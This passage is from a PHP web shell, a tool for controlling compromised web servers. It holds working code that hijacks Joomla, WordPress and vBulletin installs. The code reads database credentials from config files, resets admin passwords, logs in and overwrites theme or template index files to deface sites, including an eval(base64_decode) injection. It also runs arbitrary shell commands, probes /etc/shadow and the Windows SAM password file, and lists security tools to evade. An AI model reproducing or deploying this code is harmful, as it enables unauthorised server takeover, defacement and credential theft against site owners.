1251 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1252 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1253 $buffer = curl_exec($ch);
1254 echo "<tr align =center>";
1255 echo '<td>admin : 123456789</td>';
1256 $pos = strpos($buffer,"com_config");
1257 if($pos === false)
1258 echo("<td>[-] Login Error</td>");
1259 else
1260 echo("<td><font class=txt>[+] Login Success</font></td>");
1261
1262 $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
1263 $ch = curl_init();
1264 curl_setopt($ch, CURLOPT_URL, $url2);
1265 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1266 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1267 curl_setopt($ch, CURLOPT_HEADER, 0);
1268 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1269 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1270 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1271 $buffer = curl_exec($ch);
1272
1273 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
1274
1275 $url2=$site_url."/index.php?option=com_templates&layout=edit";
1276
1277 $ch = curl_init();
1278 curl_setopt($ch, CURLOPT_URL, $url2);
1279 curl_setopt($ch, CURLOPT_POST, 1);
1280 curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
1281
1282 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1283 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1284 curl_setopt($ch, CURLOPT_HEADER, 0);
1285 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1286 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1287 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1288 $buffer = curl_exec($ch);
1289
1290 $pos = strpos($buffer,'<dd class="message message">');
1291 if($pos === false)
1292 {
1293 echo("<td><a href=http://".$site . ">".$site."</a></td><td>Cannot Defaced</td>");
1294 }
1295 else
1296 {
1297 $defcount++;
1298 echo("<td><a href=http://".$site . ">".$site."</a></td><td><font class=txt>Joomla Defaced</font></td>");
1299 }
1300 }
1301 else
1302 {
1303 $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'");
1304 $data = mysql_fetch_array($req);
1305 $template_name=$data["template"];
1306
1307 $url2=$site_url."/index.php";
1308 $ch = curl_init();
1309 curl_setopt($ch, CURLOPT_URL, $url2);
1310 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1311 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1312 curl_setopt($ch, CURLOPT_HEADER, 1);
1313 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1314 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1315 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1316 $buffer = curl_exec($ch);
1317
1318 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
1319
1320 $url2=$site_url."/index.php";
1321 $ch = curl_init();
1322 curl_setopt($ch, CURLOPT_URL, $url2);
1323 curl_setopt($ch, CURLOPT_POST, 1);
1324 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&".$hidden."=1");
1325 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1326 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1327 curl_setopt($ch, CURLOPT_HEADER, 0);
1328 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1329 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1330 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1331 $buffer = curl_exec($ch);
1332
1333 $pos = strpos($buffer,"com_config");
1334 echo "<tr align =center>";
1335 echo '<td>admin : 123456789</td>';
1336 if($pos === false)
1337 echo("<td>[-] Login Error</td>");
1338 else
1339 echo("<td><font class=txt>[+] Login Success</font></td>");
1340
1341 $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
1342 $ch = curl_init();
1343 curl_setopt($ch, CURLOPT_URL, $url2);
1344 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1345 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1346 curl_setopt($ch, CURLOPT_HEADER, 0);
1347 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1348 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1349 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1350 $buffer = curl_exec($ch);
1351
1352 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
1353
1354 $url2=$site_url."/index.php?option=com_templates&layout=edit";
1355 $ch = curl_init();
1356 curl_setopt($ch, CURLOPT_URL, $url2);
1357 curl_setopt($ch, CURLOPT_POST, 1);
1358 curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
1359 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1360 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1361 curl_setopt($ch, CURLOPT_HEADER, 0);
1362 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1363 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1364 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1365 $buffer = curl_exec($ch);
1366
1367 $pos = strpos($buffer,'<dd class="message message fade">');
1368 if($pos === false)
1369 {
1370 echo("<td><a href=http://".$site . ">".$site."</a></td><td>Cannot Deface</td>");
1371 }
1372 else
1373 {
1374 $defcount++;
1375 echo("<td><a href=http://".$site . ">".$site."</a></td><td><font class=txt>Joomla Defaced</font></td>");
1376 }
1377 }
1378 echo "</tr>";
1379 }
1380 function changeindexvb($conf,$index)
1381 {
1382 $dol = '$';
1383
1384 $username = entre2v2($conf,"['MasterServer']['username'] = '","';");
1385 $password = entre2v2($conf,"['MasterServer']['password'] = '","';");
1386 $dbname = entre2v2($conf,"se']['dbname'] = '","';");
1387 $prefix = entre2v2($conf,"['Database']['tableprefix'] = '","';");
1388 $localhost = entre2v2($conf,"['MasterServer']['servername'] = '","';");
1389
1390 $con =@ mysql_connect($localhost,$username,$password);
1391 $db =@ mysql_select_db($dbname,$con);
1392 $ss = mysql_query("SELECT * from `".$prefix."setting` WHERE varname='bburl'");
1393 $data = mysql_fetch_array($ss);
1394
1395 echo "<tr align=center>";
1396 $index=str_replace('"','\\"',$index);
1397 $attack = "{\${eval(base64_decode(\'";
1398 $attack .= base64_encode("echo \"$index\";");
1399 $attack .= "\'))}}{\${exit()}}</textarea>";
1400 $query = "UPDATE ".$prefix."template SET template = '$attack'";
1401 $result =@ mysql_query($query,$con);
1402 if($result)
1403 echo "<td><a href=".$data["value"].">".$data["value"]."</a></td><td><font class=txt><blink>Vbulletin Forum Defaced Successfully</blink></font></td>";
1404 else
1405 echo "<td><a href=".$data["value"].">".$data["value"]."</a></td><td><blink>Cannot Deface Vbulletin Forum</blink></td>";
1406 echo "<tr>";
1407 }
1408 function changeindexwp($conf,$index)
1409 {
1410 $index = urlencode($index);
1411 $dol = '$';
1412 $username = entre2v2($conf,"define('DB_USER', '","');");
1413 $password = entre2v2($conf,"define('DB_PASSWORD', '","');");
1414 $dbname = entre2v2($conf,"define('DB_NAME', '","');");
1415 $prefix = entre2v2($conf,$dol."table_prefix = '","'");
1416 $host = entre2v2($conf,"define('DB_HOST', '","');");
1417 $con =@ mysql_connect($host,$username,$password);
1418 $db =@ mysql_select_db($dbname,$con);
1419 $req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '$1$42REgxSR$.tLV4PSbQmCKsisyCSyhq.'");
1420
1421 if($req1)
1422 {
1423 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
1424 $data = mysql_fetch_array($req);
1425 $site_url=$data["option_value"];
1426
1427 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");
1428 $data = mysql_fetch_array($req);
1429 $template = $data["option_value"];
1430
1431 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");
1432 $data = mysql_fetch_array($req);
1433 $current_theme = $data["option_value"];
1434
1435 $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
1436 $url2=$site_url."/wp-login.php";
1437
1438 $ch = curl_init();
1439 curl_setopt($ch, CURLOPT_URL, $url2);
1440 curl_setopt($ch, CURLOPT_POST, 1);
1441 curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123456789&rememberme=forever&wp-submit=Log In&testcookie=1");
1442 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1443 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
1444 curl_setopt($ch, CURLOPT_HEADER, 0);
1445 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
1446 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1447 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
1448 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
1449 $buffer = curl_exec($ch);
1450
1451 $pos = strpos($buffer,"action=logout");
1452
1453 $url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.urlencode($template);
1454 curl_setopt($ch, CURLOPT_URL, $url2);
1455 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
1456 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
1457 curl_setopt($ch, CURLOPT_HEADER, 0);
1458 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1459 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
1460 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
1461 $buffer0 = curl_exec($ch);
1462
1463 $_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
1464 $_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
1465
1466 if(substr_count($_file,"index.php") != 0)
1467 $output .= "<tr align =center>";
1468 $url2=$site_url."/wp-admin/theme-editor.php";
1469 curl_setopt($ch, CURLOPT_URL, $url2);
1470 curl_setopt($ch, CURLOPT_POST, 1);
1471 curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".$index."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
1472 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1473 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1474 curl_setopt($ch, CURLOPT_HEADER, 0);
1475 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1476 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
1477 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
1478 $buffer = curl_exec($ch);
1479 curl_close($ch);
1480 $pos = strpos($buffer,'<div id="message" class="updated">');
1481 $cond = 0;
1482 if($pos === false)
1483 $output .= "<td><a href=".$site_url.">Site : ".$site_url."</a></td><td>Cannot Deface</td>";
1484 else
1485 $output .= "<td><a href=".$site_url.">Site : ".$site_url."</a></td><td><font class=txt>Wordpress Defaced Successfully</font></td>";
1486 }
1487 else
1488 $output.= "<td colspan=2> DB Error</td>";
1489 echo $output."</tr>";
1490 global $base_path;
1491 unlink($base_path.'COOKIE.txt');
1492 }
1493 function getDisabledFunctions()
1494 {
1495 if(!ini_get('disable_functions'))
1496 {
1497 return "None";
1498 }
1499 else
1500 {
1501 return @ini_get('disable_functions');
1502 }
1503 }
1504 function getFilePermissions($file)
1505 {
1506 $perms = fileperms($file);
1507
1508 if (($perms & 0xC000) == 0xC000) {
1509 // Socket
1510 $info = 's';
1511 } elseif (($perms & 0xA000) == 0xA000) {
1512 // Symbolic Link
1513 $info = 'l';
1514 } elseif (($perms & 0x8000) == 0x8000) {
1515 // Regular
1516 $info = '-';
1517 } elseif (($perms & 0x6000) == 0x6000) {
1518 // Block special
1519 $info = 'b';
1520 } elseif (($perms & 0x4000) == 0x4000) {
1521 // Directory
1522 $info = 'd';
1523 } elseif (($perms & 0x2000) == 0x2000) {
1524 // Character special
1525 $info = 'c';
1526 } elseif (($perms & 0x1000) == 0x1000) {
1527 // FIFO pipe
1528 $info = 'p';
1529 } else {
1530 // Unknown
1531 $info = 'u';
1532 }
1533
1534 // Owner
1535 $info .= (($perms & 0x0100) ? 'r' : '-');
1536 $info .= (($perms & 0x0080) ? 'w' : '-');
1537 $info .= (($perms & 0x0040) ?
1538 (($perms & 0x0800) ? 's' : 'x' ) :
1539 (($perms & 0x0800) ? 'S' : '-'));
1540
1541 // Group
1542 $info .= (($perms & 0x0020) ? 'r' : '-');
1543 $info .= (($perms & 0x0010) ? 'w' : '-');
1544 $info .= (($perms & 0x0008) ?
1545 (($perms & 0x0400) ? 's' : 'x' ) :
1546 (($perms & 0x0400) ? 'S' : '-'));
1547
1548 // World
1549 $info .= (($perms & 0x0004) ? 'r' : '-');
1550 $info .= (($perms & 0x0002) ? 'w' : '-');
1551 $info .= (($perms & 0x0001) ?
1552 (($perms & 0x0200) ? 't' : 'x' ) :
1553 (($perms & 0x0200) ? 'T' : '-'));
1554
1555 return $info;
1556}
1557 function filepermscolor($filename)
1558 {
1559 if(!@is_readable($filename))
1560 return "<font class=readperm>".getFilePermissions($filename)."</font>";
1561 else if(!@is_writable($filename))
1562 return "<font class=noperm>".getFilePermissions($filename)."</font>";
1563 else
1564 return "<font class=wrtperm>".getFilePermissions($filename)."</font>";
1565 }
1566
1567 function yourip()
1568 {
1569 echo $_SERVER["REMOTE_ADDR"];
1570 }
1571 function phpver()
1572 {
1573 $pv=@phpversion();
1574 echo $pv;
1575 }
1576 function magic_quote()
1577 {
1578 echo get_magic_quotes_gpc()?"<font class=txt>ON</font>":"OFF";
1579 }
1580 function serverip()
1581 {
1582 echo @gethostbyname($_SERVER["HTTP_HOST"]);
1583 }
1584 function serverport()
1585 {
1586 echo $_SERVER['SERVER_PORT'];
1587 }
1588 function safe()
1589 {
1590 global $sm;
1591 return $sm?"ON :( :'( (Most of the Features will Not Work!)":"OFF";
1592 }
1593 function serveradmin()
1594 {
1595 echo $_SERVER['SERVER_ADMIN'];
1596 }
1597 function systeminfo()
1598 {
1599 echo php_uname();
1600 }
1601 function curlinfo()
1602 {
1603 echo function_exists('curl_version')?("<font class=txt>Enabled</font>"):("Disabled");
1604 }
1605 function oracleinfo()
1606 {
1607 echo function_exists('ocilogon')?("<font class=txt>Enabled</font>"):("Disabled");
1608 }
1609 function mysqlinfo()
1610 {
1611 echo function_exists('mysql_connect')?("<font class=txt>Enabled</font>"):("Disabled");
1612 }
1613 function mssqlinfo()
1614 {
1615 echo function_exists('mssql_connect')?("<font class=txt>Enabled</font>"):("Disabled");
1616 }
1617 function postgresqlinfo()
1618 {
1619 echo function_exists('pg_connect')?("<font class=txt>Enabled</font>"):("Disabled");
1620 }
1621 function softwareinfo()
1622 {
1623 echo getenv("SERVER_SOFTWARE");
1624 }
1625 function download()
1626 {
1627 $frd=$_GET['download'];
1628 $prd=explode("/",$frd);
1629 for($i=0;$i<sizeof($prd);$i++)
1630 {
1631 $nfd=$prd[$i];
1632 }
1633 @ob_clean();
1634 header("Content-type: application/octet-stream");
1635 header("Content-length: ".filesize($nfd));
1636 header("Content-disposition: attachment; filename=\"".$nfd."\";");
1637 readfile($nfd);
1638
1639 exit;
1640
1641 }
1642
1643 function HumanReadableFilesize($size)
1644 {
1645 $mod = 1024;
1646 $units = explode(' ','B KB MB GB TB PB');
1647 for ($i = 0; $size > $mod; $i++)
1648 {
1649 $size /= $mod;
1650 }
1651 return round($size, 2) . ' ' . $units[$i];
1652 }
1653
1654 function showDrives()
1655 {
1656 global $self;
1657 foreach(range('A','Z') as $drive)
1658 {
1659 if(is_dir($drive.':\\'))
1660 {
1661 $myd = $drive.":\\";
1662 ?>
1663 <a href=javascript:void(0) onClick="changedir('dir','<?php echo addslashes($myd); ?>')">
1664 <?php echo $myd; ?>
1665 </a>
1666 <?php
1667 }
1668 }
1669 }
1670 function diskSpace()
1671 {
1672 global $dir;
1673 return disk_total_space($dir);
1674 }
1675 function freeSpace()
1676 {
1677 global $dir;
1678 return disk_free_space($dir);
1679 }
1680
1681 function thiscmd($p)
1682 {
1683 $path = myexe('which ' . $p);
1684 if(!empty($path))
1685 return $path;
1686 return false;
1687 }
1688
1689 function mysecinfo()
1690 {
1691 function myparam($n, $v)
1692 {
1693 $v = trim($v);
1694 if($v)
1695 {
1696 echo '<span><font size=3>' . $n . ': </font></span>';
1697 if(strpos($v, "\n") === false)
1698 echo '<font class=txt size=3>' . $v . '</font><br>';
1699 else
1700 echo '<pre class=ml1><font class=txt size=3>' . $v . '</font></pre>';
1701 }
1702 }
1703
1704 myparam('Server software', @getenv('SERVER_SOFTWARE'));
1705 if(function_exists('apache_get_modules'))
1706 myparam('Loaded Apache modules', implode(', ', apache_get_modules()));
1707 myparam('Open base dir', @ini_get('open_basedir'));
1708 myparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
1709 myparam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
1710 $temp=array();
1711 if(function_exists('mysql_get_client_info'))
1712 $temp[] = "MySql (".mysql_get_client_info().")";
1713 if(function_exists('mssql_connect'))
1714 $temp[] = "MSSQL";
1715 if(function_exists('pg_connect'))
1716 $temp[] = "PostgreSQL";
1717 if(function_exists('oci_connect'))
1718 $temp[] = "Oracle";
1719 myparam('Supported databases', implode(', ', $temp));
1720 echo '<br>';
1721
1722 if($GLOBALS['os'] == 'Linux') {
1723 myparam('Distro : ', myexe("cat /etc/*-release"));
1724 myparam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href=javascript:void(0) onClick=\"getmydata('passwd')\">[view]</a>":'no');
1725 myparam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href=javascript:void(0) onClick=\"getmydata('shadow')\">[view]</a>":'no');
1726 myparam('OS version', @file_get_contents('/proc/version'));
1727 myparam('Distro name', @file_get_contents('/etc/issue.net'));
1728 myparam('Where is Perl?', myexe('whereis perl'));
1729 myparam('Where is Python?', myexe('whereis python'));
1730 myparam('Where is gcc?', myexe('whereis gcc'));
1731 myparam('Where is apache?', myexe('whereis apache'));
1732 myparam('CPU?', myexe('cat /proc/cpuinfo'));
1733 myparam('RAM', myexe('free -m'));
1734 myparam('Mount options', myexe('cat /etc/fstab'));
1735 myparam('User Limits', myexe('ulimit -a'));
1736
1737
1738 if(!$GLOBALS['safe_mode']) {
1739 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
1740 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
1741 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
1742 echo '<br>';
1743 $temp=array();
1744 foreach ($userful as $item)
1745 if(thiscmd($item))
1746 $temp[] = $item;
1747 myparam('Userful', implode(', ',$temp));
1748 $temp=array();
1749 foreach ($danger as $item)
1750 if(thiscmd($item))
1751 $temp[] = $item;
1752 myparam('Danger', implode(', ',$temp));
1753 $temp=array();
1754 foreach ($downloaders as $item)
1755 if(thiscmd($item))
1756 $temp[] = $item;
1757 myparam('Downloaders', implode(', ',$temp));
1758 echo '<br/>';
1759 myparam('HDD space', myexe('df -h'));
1760 myparam('Hosts', @file_get_contents('/etc/hosts'));
1761
1762 }
1763 } else {
1764 $repairsam = addslashes($_SERVER["WINDIR"]."\\repair\\sam");
1765 $hostpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\hosts");
1766 $netpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\\networks");
1767 $sampath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\lmhosts.sam");
1768 echo "<font size=3>Password File : </font><a href=".$_SERVER['PHP_SELF']."?download=" . $repairsam ."><b><font class=txt size=3>Download password file</font></b></a><br>";
1769 echo "<font size=3>Config Files : </font><a href=javascript:void(0) onClick=\"fileaction('open','$hostpath')\"><b><font class=txt size=3>[ Hosts ]</font></b></a> <a href=javascript:void(0) onClick=\"fileaction('open','$netpath')\"><b><font class=txt size=3>[ Local Network Map ]</font></b></a> <a href=javascript:void(0) onClick=\"fileaction('open','$sampath')\"><b><font class=txt size=3>[ lmhosts ]</font></b></a><br>";
1770 $base = (ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF";
1771 echo "<font size=3>Open Base Dir : </font><font class=txt size=3>" . $base . "</font><br>";
1772 myparam('OS Version',myexe('ver'));
1773 myparam('Account Settings',myexe('net accounts'));
1774 myparam('User Accounts',myexe('net user'));
1775 }
1776 echo '</div>';
1777 }
1778
1779
1780
1781 function myexe($in)
1782 {
1783 $out = '';
1784 if (function_exists('exec')) {
1785 @exec($in,$out);
1786 $out = @join("\n",$out);
1787 } elseif (function_exists('passthru')) {
1788 ob_start();
1789 @passthru($in);
1790 $out = ob_get_clean();
1791 } elseif (function_exists('system')) {
1792 ob_start();
1793 @system($in);
1794 $out = ob_get_clean();
1795 } elseif (function_exists('shell_exec')) {
1796 $out = shell_exec($in);
1797 } elseif (is_resource($f = @popen($in,"r"))) {
1798 $out = "";
1799 while(!@feof($f))
1800 $out .= fread($f,1024);
1801 pclose($f);
1802 }
1803 return $out;
1804}
1805function exec_all($command)
1806 {
1807
1808 $output = '';
1809 if(function_exists('exec'))
1810 {
1811 exec($command,$output);
1812 $output = join("\n",$output);
1813 }
1814
1815 else if(function_exists('shell_exec'))
1816 {
1817 $output = shell_exec($command);
1818 }
1819
1820 else if(function_exists('popen'))
1821 {
1822 $handle = popen($command , "r"); // Open the command pipe for reading
1823 if(is_resource($handle))
1824 {
1825 if(function_exists('fread') && function_exists('feof'))
1826 {
1827 while(!feof($handle))
1828 {
1829 $output .= fread($handle, 512);
1830 }
1831 }
1832 else if(function_exists('fgets') && function_exists('feof'))
1833 {
1834 while(!feof($handle))
1835 {
1836 $output .= fgets($handle,512);
1837 }
1838
1839
1840
1841 }
1842 }
1843 pclose($handle);
1844 }
1845
1846
1847 else if(function_exists('system'))
1848 {
1849 ob_start(); //start output buffering
1850 system($command);
1851 $output = ob_get_contents(); // Get the ouput
1852 ob_end_clean(); // Stop output buffering
1853 }
1854
1855 else if(function_exists('passthru'))
1856 {
1857 ob_start(); //start output buffering
1858 passthru($command);
1859 $output = ob_get_contents(); // Get the ouput
1860 ob_end_clean(); // Stop output buffering
1861 }
1862
1863 else if(function_exists('proc_open'))
1864 {
1865 $descriptorspec = array(
1866 1 => array("pipe", "w"), // stdout is a pipe that the child will write to
1867 );
1868 $handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array 'pipes'
1869 if(is_resource($handle))
1870 {
1871 if(function_exists('fread') && function_exists('feof'))
1872 {
1873 while(!feof($pipes[1]))
1874 {
1875 $output .= fread($pipes[1], 512);
1876 }
1877 }
1878 else if(function_exists('fgets') && function_exists('feof'))
1879 {
1880 while(!feof($pipes[1]))
1881 {
1882 $output .= fgets($pipes[1],512);
1883 }
1884 }
1885 }
1886 pclose($handle);
1887 }
1888
1889 return(htmlspecialchars($output));
1890
1891}
1892
1893$basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"<font class=txt>ON</font>":"OFF";
1894$etc_passwd=@is_readable("/etc/passwd")?"Yes":"No";
1895
1896function getOGid($value)
1897{
1898 if(!function_exists('posix_getegid')) {
1899 $user = @get_current_user();
1900 $uid = @getmyuid();
1901 $gid = @getmygid();
1902 $group = "?";
1903 $owner = $uid . "/". $gid;
1904 return $owner;
1905 } else {
1906 $name=@posix_getpwuid(@fileowner($value));
1907 $group=@posix_getgrgid(@filegroup($value));
1908 $owner = $name['name']. " / ". $group['name'];
1909 return $owner;
1910 }
1911}
1912if(!function_exists("scandir"))
1913{
1914 function scandir($dir) {
1915 $dh = opendir($dir);
1916 while (false !== ($filename = readdir($dh)))
1917 $files[] = $filename;
1918 return $files;
1919 }
1920}
1921function mainfun($dir)
1922{
1923 global $ind, $directorysperator,$os;
1924
1925 $mydir = basename(dirname(__FILE__));
1926 $pdir = str_replace($mydir,"",$dir);
1927 $pdir = str_replace("/","",$dir);
1928
1929 $files = array();
1930 $dirs = array();
1931
1932 $odir=opendir($dir);
1933 while($file = readdir($odir))
1934 {
1935 if(is_dir($dir.'/'.$file))
1936 {
1937 $dirs[]=$file;
1938 }
1939 else
1940 {
1941 $files[]=$file;
1942 }
1943 }
1944 $countfiles = count($dirs) + count($files);
1945 $dircount = count($dirs);
1946 $dircount = $dircount-2;
1947 $myfiles = array_merge($dirs,$files);
1948 $i = 0;
1949 if(is_dir($dir))
1950 {
1951 if(scandir($dir) === false)
1952 echo "<center><font size=3>Directory isn't readable</font></center>";
1953 else
1954 {
1955?><form method="post" id="myform" name="myform">
1956 <table id="maintable" style="width:100%;" align="center" cellpadding="3">
1957 <tr><td colspan="7"><center><div id="showmydata"></div></center></td></tr>
1958 <tr><td colspan="8" align="center"><font size="3">Listing folder <?php echo $dir; ?></font> (<?php echo $dircount.' Dirs And '.count($files).' Files'; ?>)</td>
1959 <tr height:12px;">
1960 <th>Name</th>
1961 <th>Size</th>
1962 <th>Permissions</th>
1963 <?php if($os != "Windows"){ echo "<th>Owner / Group</th>"; } ?>
1964 <th>Modification Date</th>
1965 <th>Rename</th>
1966 <th>Download</th>
1967 <th style="width:2%;">Action</th>
1968 </tr>
1969 <?php
1970 foreach($myfiles as $val)
1971 {
1972 $vv = addslashes($dir . $directorysperator . $val);
1973 $i++;
1974 if($val == ".")
1975 {
1976 ?><tr class=lines><td><a href=javascript:void(0) onClick="changedir('dir','<?php echo addslashes($dir); ?>')"><font class=txt>[ . ]</font></a></td><td><font size=2>CURDIR</font></td>
1977 <td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir); ?></a></td>
1978
1979 <?php if($os != 'Windows')
1980 {
1981 echo "<td align=center><font size=2>";
1982 echo getOGid($dir)."</font></td>";
1983 }
1984 ?>
1985
1986 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($vv)); ?></font></td>
1987 <td></td><td></td><td></td></</tr><?php
1988
1989 }
1990 else if($val == "..")
1991 {
1992 $val = Trail($dir . $directorysperator . $val,$directorysperator);
1993 $vv = addslashes($val);
1994 if(empty($vv))
1995 $vv = "/"; ?>
1996 <tr class=lines><td class='info'><a href=javascript:void(0) onClick="changedir('dir','<?php echo $vv; ?>')"><font class=txt>[ .. ]</font></a></td><td><font size=2>UPDIR</font></td>
1997 <td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($val); ?></a></td>
1998 <?php if($os != 'Windows')
1999 {
2000 echo "<td align=center><font size=2>";
2001 echo getOGid($val)."</font></td>";
2002
2003 } ?>
2004 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($val)); ?></font></td>
2005 <td></td><td></td><td></td></tr><?php continue;
2006 }
2007 }
2008 foreach($myfiles as $val)
2009 {
2010 $vv = addslashes($dir . $directorysperator . $val);
2011 $i++;
2012
2013 if(is_dir($vv))
2014 {
2015 if($val == "." || $val == "..")
2016 continue; ?>
2017 <tr class=lines>
2018 <td class='dir'><a href=javascript:void(0) onClick="changedir('dir','<?php echo $vv; ?>')">[ <?php echo $val; ?> ]</a></td>
2019 <td class='info'><font size=2>DIR</font></td>
2020
2021 <td class='info'><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir . $directorysperator . $val); ?></a></td>
2022 <?php if($os != 'Windows')
2023 {
2024 echo "<td align=center><font size=2>";
2025 echo getOGid($val)."</font></td>";
2026 } ?>
2027 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
2028 <td class="info"><a href=javascript:void(0) onClick="fileaction('rename','<?php echo $vv; ?>')"><font size=2>Rename</font></a></td>
2029 <td></td>
2030 <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
2031 </tr></font>
2032 <?php
2033 }
2034 else if(is_file($vv))
2035 {
2036 ?>
2037 <tr class=lines>
2038 <td class='file'><a href=javascript:void(0) onClick="fileaction('open','<?php echo $vv; ?>')"><?php if(("/" .$val == $_SERVER["SCRIPT_NAME"]) || ($val == "index.php") || ($val == "index.html") || ($val == "config.php") || ($val == "wp-config.php")) { echo "<font color=red>". $val . "</font>"; } else { echo $val; } ?></a> <?php if($val == "index.php" || $val == "index.html") { if(strlen($ind) != 0) { echo "<a href=javascript:void(0) onClick=\"defacefun('$vv')\"><font color=red>( Deface IT )</font></a>"; } } ?></td>
2039
2040 <td class='info'><font size=2><?php echo HumanReadableFilesize(filesize($dir . $directorysperator . $val));?></font></td>
2041
2042 <td class='info'><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir . $directorysperator . $val); ?></a></td>
2043
2044 <?php if($os != 'Windows')
2045 {
2046 echo "<td align=center><font size=2>";
2047 echo getOGid($val)."</font></td>";
2048 } ?>
